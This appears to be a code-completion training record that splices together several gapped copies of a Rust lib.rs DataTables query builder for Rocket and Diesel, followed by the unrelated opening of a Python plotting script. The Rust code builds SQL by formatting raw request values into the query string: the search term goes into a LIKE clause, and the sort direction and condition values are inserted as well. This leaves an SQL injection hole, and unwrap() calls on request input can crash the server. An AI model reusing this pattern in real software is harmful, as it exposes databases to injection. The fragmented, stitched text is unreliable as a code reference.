pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
} | random_line_split | |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => |
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
} | conditional_block |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct Tables<'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self |
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
} | identifier_body |
lib.rs |
/*
8888888b. 8888888b. d8888 88888888888 d8888 888888b. 888 8888888888 .d8888b.
888 Y88b 888 "Y88b d88888 888 d88888 888 "88b 888 888 d88P Y88b
888 888 888 888 d88P888 888 d88P888 888 .88P 888 888 Y88b.
888 d88P 888 888 d88P 888 888 d88P 888 8888888K. 888 8888888 "Y888b.
8888888P" 888 888 d88P 888 888 d88P 888 888 "Y88b 888 888 "Y88b.
888 T88b 888888 888 888 d88P 888 888 d88P 888 888 888 888 888 "888
888 T88b 888 .d88P d8888888888 888 d8888888888 888 d88P 888 888 Y88b d88P
888 T88b 8888888P" d88P 888 888 d88P 888 8888888P" 88888888 8888888888 "Y8888P"
*/
/* Form diesel and serve imports */
use diesel::*;
use rocket::request::{FormItems, FromForm};
use serde::Serialize;
use diesel::sql_types::BigInt;
/* This one stands for the r-datatables counting struct */
#[derive(QueryableByName, Serialize)]
pub struct Count {
#[sql_type = "BigInt"]
pub count: i64,
}
/*
"Tables" explanation:
===================
-> Data Structure comes like:
(JoinType, (dest_table_name, dest_table_key), (origin_table_name, origin_table_key))
-> Implemented Struct will return something like:
"
`JoinType` JOIN `dest_table_name`
ON `origin_table_name`.`origin_table_key` = `table2`.`common_field` *( n-th)
"
*/
#[derive(Debug, Clone)]
pub struct | <'a> {
pub origin: (&'a str, &'a str), /* From */
pub fields: Vec<&'a str>, /* Fields to seek for */
pub join_targets: Option<Vec<(&'a str, (&'a str, &'a str), (&'a str, &'a str))>>, /* Join Targets explained over here */
pub datatables_post_query: DataTableQuery, /* Incoming Query */
pub query: Option<String>, /* Our builded query holder */
pub condition: Option<Vec<(&'a str, &'a str, &'a str)>>, /* (And/Or, Field_Name, Value) */
pub distinct: Option<bool>,
}
impl<'a> Tables<'a> {
pub fn generate(&mut self) -> String {
match self.datatables_post_query.order[0].0 {
Some(column_index_to_order) => format!(
"{} ORDER BY {} {}",
self.select().join().where_like().condition().query.to_owned().unwrap(),
self.fields[column_index_to_order as usize],
&self.datatables_post_query.order[0]
.1
.as_ref()
.unwrap()
.to_uppercase()
),
None => self.select().join().where_like().condition().query.to_owned().unwrap(),
}
}
/* Returns fields for the query */
pub fn select(&mut self) -> Self {
let stmt = &self
.fields
.iter()
.map(|field| format!("{}, ", field))
.collect::<String>();
self.query = Some(
format!("SELECT {} {} FROM {}",
match self.distinct {
Some(_) => {"DISTINCT"}
None => {""}
},
stmt[..(stmt.len() - 2)].to_owned(),
self.origin.0
)
.to_owned(),
);
self.to_owned()
}
pub fn where_like(&mut self) -> Self {
/* #Where like:
## This function receives self (as all of the SQL generators) and
reparses the content of "where" from the incoming Datatable query
to do a seeking for desired information over all table fields
returns... gues what? self!
*/
let stmt = self
.fields
.iter()
.map(|field| {
format!(
" CAST({} as TEXT) LIKE '%{}%' OR",
field,
self.datatables_post_query.search[0].0.as_ref().unwrap()
)
})
.collect::<String>();
self.query = Some(
format!(
"{} WHERE ({})",
self.query.to_owned().unwrap(),
stmt[..(stmt.len() - 2)].to_owned()
)
.to_owned(),
);
self.to_owned()
}
pub fn join(&mut self) -> Self {
/*
# How this works?
## We will match the existing needing of appending the "join statement" or not
As well we do on other self sql generators functions, we'll opt to not do an if stmt
for seeking the "last" target and doing a exactly cut for the string to append.
Returns self.
*/
match self.join_targets {
Some(_) => {
let stmt = self
.join_targets
.as_ref()
.unwrap()
.iter()
.map(|(join_type, (target, target_key), (origin, origin_key))| {
format!(
"{} JOIN {} ON {}.{} = {}.{} ",
join_type.to_uppercase(), target, origin, origin_key, target, target_key,
)
})
.collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => self.to_owned(),
}
}
pub fn condition(&mut self) -> Self {
match self.condition {
Some(_) => {
let stmt = self.condition.as_ref().unwrap().iter().map(|(sub_cond, target, value)| {
format!("{} {} = '{}'", sub_cond.to_uppercase(), target, &value.to_string())
}).collect::<String>();
self.query = Some(
format!("{} {}", self.query.to_owned().unwrap(), stmt.to_owned()).to_owned(),
);
self.to_owned()
}
None => {
self.to_owned()
}
}
}
}
#[allow(non_snake_case)]
#[derive(Debug, Clone)]
pub struct DataTableQuery {
pub draw: i32, /* Stands for the n-th time that we're drawing */
pub columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)>,
pub order: Vec<(Option<i32>, Option<String>)>,
pub start: i32, /* How much to skip */
pub length: i32, /* How much to retrieve */
pub search: Vec<(Option<String>, bool)>,
pub info: Option<i32>,
}
impl<'f> FromForm<'f> for DataTableQuery {
// In practice, we'd use a more descriptive error type.
type Error = ();
fn from_form(items: &mut FormItems<'f>, strict: bool) -> Result<DataTableQuery, ()> {
let mut draw: Option<i32> = None;
let mut start: Option<i32> = None;
let mut length: Option<i32> = None;
let tmp_columns: Vec<(
Option<i32>,
Option<String>,
Option<bool>,
Option<bool>,
Option<String>,
Option<bool>,
)> = vec![(None, None, None, None, None, None)];
let mut order_tuple: (Option<i32>, Option<String>) = (None, None);
let mut search_value: Option<String> = None;
let mut time_stamp: Option<i32> = None;
for item in items {
match item.key.as_str() {
"draw" if draw.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
draw = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"start" if start.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
start = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"length" if length.is_none() => {
let decoded = item.value.url_decode().map_err(|_| ())?;
length = Some(match decoded.parse::<i32>() {
Ok(item_val) => item_val,
Err(_err_msg) => 0,
});
}
"search%5Bvalue%5D" if search_value.is_none() => {
let decoded = Some(item.value.url_decode().map_err(|_| ())?);
search_value = decoded;
}
key if key.contains("order%5B0%5D") => {
if key.contains("order%5B0%5D%5Bcolumn%5D") {
order_tuple.0 = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
} else {
order_tuple.1 = Some(item.value.url_decode().map_err(|_| ())?);
}
}
"_" => {
time_stamp = Some(
item.value
.url_decode()
.map_err(|_| ())?
.parse::<i32>()
.unwrap(),
);
}
_ if strict => return Err(()),
_ => {}
}
}
Ok(DataTableQuery {
draw: match draw {
Some(value) => value,
None => 0,
},
columns: tmp_columns[1..].to_owned(),
order: vec![order_tuple],
start: match start {
Some(value) => value,
None => 0,
},
length: match length {
Some(value) => value,
None => 0,
},
search: vec![(search_value, false)],
info: time_stamp.to_owned(),
})
}
}
#[allow(non_snake_case)]
#[derive(Debug, Serialize)]
pub struct OutcomeData<T> {
pub draw: i32,
pub recordsTotal: i64,
pub recordsFiltered: i32,
pub data: Vec<T>,
}
pub fn datatables_query<
T: diesel::deserialize::QueryableByName<diesel::pg::Pg> + std::fmt::Debug + std::clone::Clone,
>(
table: Tables,
conn: PgConnection,
) -> OutcomeData<T> {
println!("{}", table.clone().generate());
let (data_results, total_data): (Vec<T>, Count) = (
sql_query(table.clone().generate())
.load(&conn)
.expect("Failed to retrieve information"),
sql_query(format!("SELECT COUNT(*) FROM {}", table.origin.0))
.load::<Count>(&conn)
.expect("Query failed")
.pop()
.expect("No rows"),
);
let tmp_results = data_results[(table.datatables_post_query.start as usize)..].to_vec();
OutcomeData::<T> {
draw: table.datatables_post_query.draw, /* N-th draw */
recordsTotal: total_data.count, /* How much we have on this table */
recordsFiltered: data_results.len() as i32, /* How much query has returned */
data: if tmp_results.len() >= (table.datatables_post_query.length as usize) {
tmp_results[..(table.datatables_post_query.length as usize)].to_vec()
} else {
tmp_results.to_vec()
},
}
}
| Tables | identifier_name |
plot_3d.py |
from mpl_toolkits.mplot3d import Axes3D
from setup_matplotlib import *
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import numpy as np
from sklearn import linear_model
#from random import random, seed
import time
from params import *
from linreg_functions import *
def plot_3D(n,lamb=[0.0],rand=False,var_check=False,diff_noise=False,exit_early=True,var_mse=False):
# Make data.
n2=n**2
np.random.seed(seed)
x = np.arange(0, 1.0001, 1.0/(n-1))
y = np.arange(0, 1.0001, 1.0/(n-1))
x, y = np.meshgrid(x,y)
z0 = FrankeFunction(x, y)
if (verbosity>0):
print('')
print('#############################################')
print('')
if (not (var_check and diff_noise)):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
else:
z=z0
xv,yv,fv=init_xy_vectors(n,rand,rearr=True,x=x,y=y,z=z)
if (var_check): #check the variance terms of beta vs. the equation from lecture notes
# Var[beta_j]=sigma^2 * ((X.T@X)^-1)_jj
if (verbosity>0):
print('Variance check, lambda %.2e'%lamb[0])
if (diff_noise):
#add different noise for each split. Requires no noise in base data
fv0=np.copy(fv)
deg=5
n_p=(deg+1)*(deg+2)//2
k=4
m=100 #100 different splits
beta_mean=np.zeros(n_p)
betas=np.zeros(shape=(n_p,m*k))
bvs=np.zeros(shape=(n_p,m*k))
bv_calc=np.zeros(n_p)
bv_std=np.zeros(n_p)
bv_sum=np.zeros(n_p)
for i in range(m):
if (verbosity>1):
print('split number %i of %i'%(i,m))
if (diff_noise):#add different noise for each split. Requires no noise in base data
fv = fv0 + np.random.normal(0.0,sigma,size=(n**2,1))
xk,yk,fk,nk=split_data_kfold(xv,yv,fv,k)
mse,r2,betak,bv=polfit_kfold(xk,yk,fk,nk,k,n2,deg=5,lamb=lamb[0],var_mse=var_mse)
#get all beta values and estimated variances from all k-fold fits
betas[:,i*k:(i+1)*k]=betak*1.0
bvs[:,i*k:(i+1)*k]=bv*1.0
bv_sum+=np.mean(bv,axis=1) #get the mean of the estimated var
beta_mean=np.mean(betas,axis=1)
bv_mean=bv_sum/m
be_std=np.sqrt(bv_mean)
for i in range(m*k):
for j in range(n_p):
bv_calc[j]+=(betas[j,i]-beta_mean[j])**2
bv_std[j]+=(bvs[j,i]-bv_mean[j])**2
bv_calc=bv_calc/(m*k)
bv_std=np.sqrt(bv_std/(m*k))
b_std=np.sqrt(bv_calc)
if (verbosity > 0):
print('')
print('Plotting betas')
for i in range(n_p):
if (verbosity>1):
print('beta %i: calc_var = %10.5f , eq_var = %10.5f'%(i,bv_calc[i],bv_mean[i]))
plot_betas(betas[i,:],cal_std=b_std[i],b_mean=beta_mean[i],eq_std=np.array([be_std[i]]),nb=i,lamb=lamb[0],n=n,btype='beta',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
plot_betas(bvs[i,:],cal_std=bv_std[i],b_mean=bv_mean[i],nb=i,lamb=lamb[0],n=n,btype='var',plt_title=False,plt_val=True,diff_noise=diff_noise,var_mse=var_mse)
if (exit_early):
return
#Plot the surface without noise
if (verbosity>0):
print('Plotting Franke function without noise')
plot_surf(x,y,z0,colbar=True)
plot_surf(x,y,z0,plt_title=True)
if (var_check and diff_noise):
if (sigma>0.0):
noise=np.random.normal(0.0,sigma,size=(n,n))
z=z0+noise
#Plot the surface
if (verbosity>0):
print('Plotting Franke function with noise')
plot_surf(x,y,z,noise=True)
